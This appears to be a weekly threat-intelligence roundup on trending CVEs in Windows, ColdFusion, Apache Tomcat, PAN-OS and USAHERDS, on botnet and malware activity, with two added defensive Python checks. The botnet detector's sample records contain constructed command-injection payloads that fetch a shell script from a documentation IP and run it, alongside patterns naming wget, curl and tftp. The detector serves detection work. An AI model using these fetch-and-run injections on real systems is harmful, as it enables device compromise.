Executive Summary
This week, a critical vulnerability in Acclaim Systems' USAHERDS, involving hard-coded credentials, was added to the CISA KEV catalog. Proof-of-concept exploits have emerged for high-severity vulnerabilities in Microsoft Windows and Apache Tomcat. Adobe also released important updates for ColdFusion 2023 and 2021, addressing a flaw that could allow arbitrary file reading. These updates stress the importance of immediate patching to prevent exploitation.
Botnet activity is on the rise, with Zerobot targeting Tenda WiFi routers and Andoryu exploiting vulnerabilities in GitLab. IoT Reaper and AndroxGh0St continue attacking Cisco routers and PHP Unit, while veteran botnets like Mirai and Tsunami focus on an eight-year-old flaw in the Eir D1000 modem, underscoring the dangers of outdated infrastructure.
Additionally, Northwave discovered LITTLELAMB.WOOLTEA, a backdoor malware, during an active attack on a Palo Alto Networks firewall. Kaspersky also reported that the Cloud Atlas group uses sophisticated phishing campaigns to exploit Microsoft Office vulnerabilities in their cyber espionage efforts.
Trending / Critical Vulnerabilities
The vulnerabilities trending this week reflect the latest emerging and widely discussed threats and help defenders prioritize remediation.
A high-severity elevation of privilege vulnerability (CVSS 7.8) has been identified in the Windows Cloud Files Mini Filter Driver, specifically affecting Windows 11 23H2 installations. Proof-of-concept (PoC) code for the vulnerability is available, increasing the urgency for remediation. Microsoft has addressed this issue in the June 2024 Patch Tuesday updates, and users are strongly advised to apply the patch immediately to secure their systems against potential exploitation.
A high-severity path traversal vulnerability (CVSS 7.4) has been discovered in Adobe ColdFusion, impacting both the 2023 and 2021 versions. This vulnerability could allow attackers to access and read arbitrary files on compromised servers, posing a significant risk to sensitive data. Users of affected versions are strongly encouraged to implement appropriate security updates to mitigate potential exploitation.
A critical Time-of-Check Time-of-Use (TOCTOU) race condition vulnerability, rated 9.8 on the CVSS scale, has been identified in Apache Tomcat during JSP compilation. This flaw could enable remote code execution (RCE) on case-insensitive file systems under specific conditions. Exploitation requires the default servlet to have write access enabled, which is not the default configuration. With a proof-of-concept (PoC) available, this vulnerability poses a serious risk, and administrators are urged to review their configurations and apply the necessary patches without delay.
A critical remote code execution vulnerability has been identified in Apache Tomcat, a widely used open-source web server and servlet container for deploying Java-based applications. Assigned a CVSS score of 9.0, this flaw stems from an incomplete mitigation of CVE-2024-50379. The vulnerability primarily affects systems with case-insensitive file systems where the default servlet's write functionality is enabled. Apache addressed this issue across multiple patch releases, emphasizing the importance of applying updates to mitigate potential risks.
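Both Tomcat issues above hinge on one setting: the default servlet's readonly init-param being set to false. The following added check (not code from the roundup or from the Apache project) parses a Tomcat web.xml and reports that posture; it assumes the standard conf/web.xml layout, and the two sample documents are constructed.

```python
"""Audit a Tomcat web.xml for a DefaultServlet with write access enabled.
CVE-2024-50379 and its follow-up are only exploitable when the default
servlet's 'readonly' init-param is false (Tomcat's default is true), so
this check surfaces that setting for review alongside patching."""
import xml.etree.ElementTree as ET

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"


def _local(tag: str) -> str:
    """Strip the namespace so javaee and jakartaee web.xml files both work."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name: str) -> str:
    """Text of the first direct child with the given local name (or '')."""
    return next((c.text or "" for c in elem if _local(c.tag) == name), "").strip()


def default_servlet_readonly(web_xml: str) -> dict:
    """Report the DefaultServlet write posture: found?, effective readonly, set explicitly?"""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != DEFAULT_SERVLET_CLASS:
            continue
        readonly, explicit = True, False  # Tomcat default when the param is absent
        for param in servlet:
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "readonly":
                explicit = True
                readonly = _child_text(param, "param-value").lower() != "false"
        return {"found": True, "readonly": readonly, "explicit": explicit}
    return {"found": False, "readonly": True, "explicit": False}


# Constructed samples: the hardened default, and the weak variant with readonly=false.
SAFE_WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""
WEAK_WEB_XML = SAFE_WEB_XML.replace(
    "</servlet>",
    "<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param></servlet>",
)
```

Run default_servlet_readonly() on the text of conf/web.xml and on each webapp's WEB-INF/web.xml, since an application can redeclare the default servlet; a result with readonly False means the write path these vulnerabilities depend on is open.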
Palo Alto Networks PAN-OS software is impacted by an OS command injection vulnerability, which enables administrators with access to the management web interface to escalate privileges and perform root-level actions on the firewall. Rated with a CVSS score of 7.2 (High), this flaw highlights the need for immediate remediation and stringent access policies.
A high-severity vulnerability (CVSS Score 8.1) has been identified in Acclaim Systems' USAHERDS, stemming from the use of hard-coded credentials. This flaw could allow attackers to execute arbitrary code on vulnerable servers. The issue affects USAHERDS versions 7.4.0.1 and earlier, posing a significant risk to systems running these versions. Recognizing its critical nature, the vulnerability has been added to the CISA KEV catalog, emphasizing the need for immediate remediation.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities exploited by botnets, including recent CVEs logged in MISP. The top five CVEs are presented with payloads suggestive of botnet activity, such as wget invocations that fetch from raw IP addresses.
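As an added illustration of the heuristic used above (not code from the roundup or its sensor platform), the following script flags request payloads in which a downloader is pointed at a bare IPv4 host; the record format and the sample sensor lines are constructed assumptions.

```python
"""Flag request payloads that fetch a stager from a bare IPv4 host, the
botnet-activity heuristic described above (wget/curl aimed at an IP literal
rather than a hostname). Sample sensor records below are constructed."""
import re
from typing import Optional
from urllib.parse import unquote

# A downloader keyword, then (within the same shell command) a URL whose host is an IPv4 literal.
DOWNLOADER = re.compile(
    r"\b(?P<tool>wget|curl|tftp)\b[^;|&]*?"
    r"(?:https?://)?(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?::\d{1,5})?(?P<path>/[^\s;|&'\"]*)?",
    re.IGNORECASE,
)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b", re.IGNORECASE)


def classify_payload(payload: str) -> Optional[dict]:
    """Return a finding when the payload matches the heuristic, else None."""
    decoded = unquote(unquote(payload))  # sensors frequently see double-encoded parameters
    m = DOWNLOADER.search(decoded)
    if not m:
        return None
    return {
        "tool": m.group("tool").lower(),
        "host": m.group("ip"),
        "path": m.group("path") or "/",
        "piped_to_shell": bool(PIPE_TO_SHELL.search(decoded)),
    }


def scan_sensor_lines(lines):
    """Apply the heuristic to 'SRC METHOD TARGET' records and return the hits."""
    hits = []
    for line in lines:
        src, _method, target = line.split(" ", 2)
        finding = classify_payload(target)
        if finding:
            hits.append({"src": src, **finding})
    return hits


# Constructed records using RFC 5737 documentation addresses.
SAMPLE_LINES = [
    "203.0.113.5 GET /device.cgi?cmd=wget%20http://198.51.100.7/x.sh%3B%20sh%20x.sh",
    "203.0.113.9 POST /api/import?src=curl%20http://198.51.100.7:8080/b%20%7C%20sh",
    "203.0.113.2 GET /index.php?page=wget%20https://example.org/update.sh",
    "203.0.113.3 GET /robots.txt",
]
```

The third record is deliberately not flagged: a download from a hostname is ordinary administrative traffic, and it is the IP-literal host (often with a pipe to a shell) that distinguishes mass botnet stagers.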
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
During a forensic investigation, Northwave researchers uncovered an active attack targeting a Palo Alto Networks firewall. Detailed analysis of the compromised device revealed the presence of a novel, stealthy, and sophisticated backdoor, which has been linked to the LITTLELAMB.WOOLTEA malware.
Kaspersky reports that the Cloud Atlas cyber espionage group employs a sophisticated infection chain initiated through phishing emails containing malicious documents. These documents exploit a vulnerability in Microsoft Office's formula editor (CVE-2018-0802) to launch their attacks.
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database (NVD). The LOVI Platform aggregates and distributes data from open sources and social media; it currently tracks over 100 security alerts and is planned to expand.
External References
- https://www.cisa.gov/news-events/alerts/2024/12/23/cisa-adds-one-known-exploited-vulnerability-catalog
- https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/
- https://northwave-cybersecurity.com/hubfs/LITTLELAMB%20WOOLTEA%20technical%20writeup%20Schrijver%20and%20Oudenaarden.pdf
- https://medium.com/@patelvidhi4288/deep-dive-poc-of-cve-2024-50379-exploit-tomcat-vulnerability-9-8-severity-776cfcfcf3ed
- https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2024-50379-tomcat-remote-code-execution
- https://securityonline.info/poc-exploit-released-for-cve-2024-30085-windows-elevation-of-privilege-vulnerability/